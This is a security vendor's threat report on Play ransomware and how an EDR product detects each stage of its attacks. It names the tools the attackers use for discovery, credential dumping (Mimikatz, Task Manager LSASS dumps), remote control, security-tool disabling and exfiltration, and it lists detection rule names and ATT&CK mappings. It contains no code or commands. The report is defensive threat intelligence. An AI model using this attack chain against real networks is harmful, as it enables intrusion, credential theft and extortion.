Play Ransomware Attack Cases Detected by AhnLab EDR

Play ransomware, also known as Balloonfly or PlayCrypt, was first identified in June 2022 and has reportedly attacked over 300 organizations worldwide since then. A notable characteristic of the ransomware, which remains actively in use, is its addition of the “.PLAY” extension to files following encryption. Like other ransomware threat actors, they steal information before encrypting systems to threaten victims and publish lists of attacked companies on their website.

 

Figure 1. Disclosed company information

 

According to a report by Unit42 of Palo Alto Networks, a collaboration between Play ransomware and the Andariel group has been confirmed. In this case, the Andariel group utilized malware known as Sliver and DTrack to steal information, and then a Play ransomware attack was carried out using the same attack infrastructure. For reference, the Andariel group has also used SHATTEREDGLASS and Maui ransomware in past attacks. [1] [2]

 

The initial access methods are known to involve abusing valid accounts or attacking vulnerabilities in exposed services. Notable examples include the ProxyNotShell vulnerabilities (CVE-2022-41040, CVE-2022-41082) in the MS Exchange Server and the CVE-2020-12812, CVE-2018-13379 vulnerabilities in FortiOS.

 

This section will introduce the known attack methods of the Play ransomware threat actors, as well as the methods AhnLab EDR uses to detect the attack techniques observed during the process of taking control of an organization after initial access. [3] [4] [5]

 

AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution, providing powerful threat monitoring, analysis, and response capabilities for endpoint areas based on Korea’s self-behavior-based engine. AhnLab EDR continuously collects information related to suspicious behaviors based on each type, allowing users to precisely perceive threats from a detection, analysis, and response perspective. Users then can conduct comprehensive analysis based on the data to identify causes, respond with appropriate measures, and establish processes to prevent threat recurrence.

 

Figure 2. AhnLab EDR

 

1. Discovery

Threat actors can gather information on active systems and port numbers, which represent running services, in a target domain through port scanning. Through this network exploration process, they identify the network’s structure, such as subnet and host information. Play ransomware threat actors are known to use the NetScan tool during the process of collecting network information.

 

They then collect Active Directory information on the current network, such as domain controllers and domain trust relationships. Windows’ default tool, Nltest, can be used for this, and the most common tool, AdFind, may also be installed. The threat actors can use the results from AdFind to learn the structure of the domain environment and identify attack targets for lateral movement.

 

Finally, BloodHound is also known to be used. BloodHound is a tool that collects Active Directory domain-related information and helps identify attack paths for privilege escalation. It shows modeled, GUI-based results, using a graph to visualize the shortest route for threat actors to gain domain administrator privileges in the domain.

 

Figure 3. EDR detection of threat actor attack actions used in the Discovery phase

 

2. Privilege Escalation

During the privilege escalation phase, threat actors are known to use Windows Privilege Escalation Awesome Scripts (WinPEAS), an open-source tool publicly available on GitHub. WinPEAS collects various information such as system configurations, user accounts, and file permissions, and detects vulnerabilities and misconfigurations that can be exploited for privilege escalation. Threat actors can use the results to gain administrator privileges.

 

Figure 4. EDR detection of WinPEAS used in the Privilege Escalation phase

 

3. Credential Access

In environments where the organization’s infrastructure uses Active Directory, threat actors can collect domain environment information through the Discovery process, steal credential information, and then use it to move laterally, ultimately taking control of the domain environment.

 

Threat actors are known to use Mimikatz or abuse the Task Manager (taskmgr.exe) for this purpose. Mimikatz is a program with features to extract account credentials in a Windows OS environment. As an open-source project publicly available on GitHub, it is favored by threat actors. Among its supported features is the ability to extract NT Hashes (a hash used in the NTLM authentication protocol) stored in the memory of the LSASS process.

 

However, such memory dump actions are considered suspicious by security products, and suspicious tools like Mimikatz are key detection targets for security products. One method to bypass this is by abusing the Task Manager, which involves not only using its features to view and control the list of currently running processes but also enables the creation of memory dumps of running processes. The LSASS process dump generated through the Task Manager can later be analyzed with other tools to extract the necessary information.

 

Figure 5. EDR detection of threat actor attack actions used in the Credential Access phase

 

4. Command and Control

In the stage of controlling infected systems, Cobalt Strike and Empire are known to be primarily used. These types of malware can be detected and blocked by V3 products. However, the Play ransomware threat actors also use AnyDesk to control infected systems.

 

Remote management tools like AnyDesk are often used for legitimate remote control and management purposes, which makes it challenging for anti-malware products to simply detect and block them. Threat actors exploit this limitation, and in addition to AnyDesk, tools such as GotoHTTP, RustDesk, and Atera are also exploited. Even when users use remote administration tools for normal remote control purposes, AhnLab EDR collects and provides related data to allow administrators to recognize and respond to suspicious behaviors.

 

While threat actors may communicate directly with the C&C server, they may also install proxy tools. These tools are mainly used to expose infected systems to the outside when they are within a private network, such as a NAT environment, since they are normally inaccessible. It is also known that Play ransomware threat actors have used Plink in their attacks. Plink is a Secure Shell (SSH) client that is part of the PuTTY toolset. It mainly operates in a command-line interface and is used to establish SSH connections to remote servers or perform port forwarding.

 

Figure 6. EDR detection of threat actor attack actions used in the Command and Control phase

 

5. Lateral Movement

Threat actors can leverage credential information collected during the Credential Access phase to move laterally and take control of an organization’s internal network. Cobalt Strike provides not only control over infected systems but also various functions, including information gathering, credential theft, and lateral movement. Play ransomware threat actors are also known to have utilized Cobalt Strike’s SMB beacon during the lateral movement process.

 

In many breach incidents, not only Cobalt Strike but also a tool called PsExec is commonly abused during lateral movement. PsExec is one of Microsoft’s Sysinternals tools that allows commands to be executed on remote systems. However, when threat actors use credential information gathered during the Credential Access phase, PsExec can be abused to execute malicious commands or payloads on other systems within the network.

 

 

Figure 7. EDR detection of threat actor attack actions used in the Lateral Movement phase [6]

 

6. Defense Evasion

Generally, organizations such as institutes and companies use various security products to prevent security threats. As most users nowadays have security products installed on their PCs, threat actors often attempt to disable the security products after initial access. Threat actors attempt to deactivate security products using various tools. The problem is that many of the tools used in the process are not malware strains, but those that can also be used for legitimate purposes.

 

For example, threat actors often use tools like Process Hacker to disable security products. Since these tools are frequently used for legitimate purposes, it can be challenging for anti-malware solutions to detect and block them. In fact, Play ransomware threat actors are known to exploit tools like Process Hacker, GMER, and IOBit Uninstaller during the Defense Evasion phase.

 

Process Hacker is a tool that displays a list of currently running processes and provides various functions such as querying related information and controlling processes. GMER is an anti-rootkit tool that detects hidden processes, services, files, registry entries, and drivers. IOBit Uninstaller, as its name suggests, is a tool that allows users to view installed programs on a computer and uninstall selected programs. These tools are commonly used in intrusion incidents, and AhnLab EDR detects these tools as threats when used in attacks, enabling administrators to identify them in advance.

 

Figure 8. EDR detection of threat actor attack actions used in the Defense Evasion phase

 

7. Collection/Exfiltration

Like other ransomware threat actors, Play ransomware threat actors not only encrypt an organization’s systems but also steal information beforehand to use for extortion. Threat actors collect sensitive information from compromised systems, compress it, and then exfiltrate it.

 

Although many tools exist for compressing files and folders, Play ransomware threat actors are primarily known to use WinRAR. The compressed files are then exfiltrated using WinSCP.

 

Figure 9. EDR detection of threat actor attack actions used in the Collection/Exfiltration phase

 

8. Impact

Play ransomware encrypts users’ files and appends the “.PLAY” extension to them, before generating a ransom note named “ReadMe.txt.” The ransom note includes the threat actor’s email address and a Tor link to the Play ransomware page, which contains information about the affected organization.

 

Figure 10. EDR detection of Play ransomware

 

9. Conclusion

Play ransomware threat actors remain active to this day and are even suspected of collaborating with the Andariel group, which is reportedly supported by North Korea. The threat actors gain initial access to organizations by exploiting vulnerabilities or abusing compromised accounts, gradually taking control of the internal network, collecting sensitive information, and ultimately encrypting the systems they have compromised.

 

AhnLab EDR detects threats at each stage of the known attack methods of Play ransomware threat actors, helping administrators identify the cause, respond appropriately, and establish recurrence-prevention processes. Additionally, it collects and highlights information about suspicious tools being installed or executed within the organization as key activities, enabling administrators to identify and respond to suspicious behavior effectively.

 

Behavior Detection
– LateralMovement/EDR.ADFind.M10710
– Infostealer/DETECT.Nltest.M10657
– Execution/EDR.Behavior.M10482
– Escalation/EDR.WinPEAS.M12246
– Execution/EDR.SharpHound.M11547
– CredentialAccess/EDR.Event.M11566
– CredentialAccess/EDR.Mimikatz.M12363
– Execution/DETECT.AnyDesk.M11495
– Execution/DETECT.Plink.M12255
– LateralMovement/EDR.PSExec.M10481
– DefenseEvasion/EDR.GMER.M11645
– DefenseEvasion/DETECT.IObit.M12365
– Execution/DETECT.ProcHacker.M11647
– Infostealer/DETECT.WinRAR.M12364
– Execution/DETECT.WinSCP.M11619
– Ransom/EDR.Decoy.M2470

 

Tactic	Technique
Discovery (TA0007)	Remote System Discovery (T1018) System Owner/User Discovery (T1033) Network Service Discovery (T1046) Permission Groups Discovery: Local Groups (T1069.001) Permission Groups Discovery: Domain Groups (T1069.002) Account Discovery: Local Account (T1087.002) Account Discovery: Domain Account (T1087.002) Domain Trust Discovery (T1482) Group Policy Discovery (T1615)
Credential Access (TA0006)	OS Credential Dumping: LSASS Memory (T1003.001)
Command and Control (TA0011)	Remote Access Software (T1219) Protocol Tunneling (T1572)
Lateral Movement (TA0008)	Lateral Tool Transfer (T1570)
Defense Evasion (TA0005)	Impair Defenses: Disable or Modify Tools (T1562.001)
Collection (TA0009)	Archive Collected Data: Archive via Utility (T1560.001)
Exfiltration (TA0010)	Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)
Impact (TA0040)	Financial Theft (T1657) Data Encrypted for Impact (T1486)

MITRE ATT&CK Mapping Information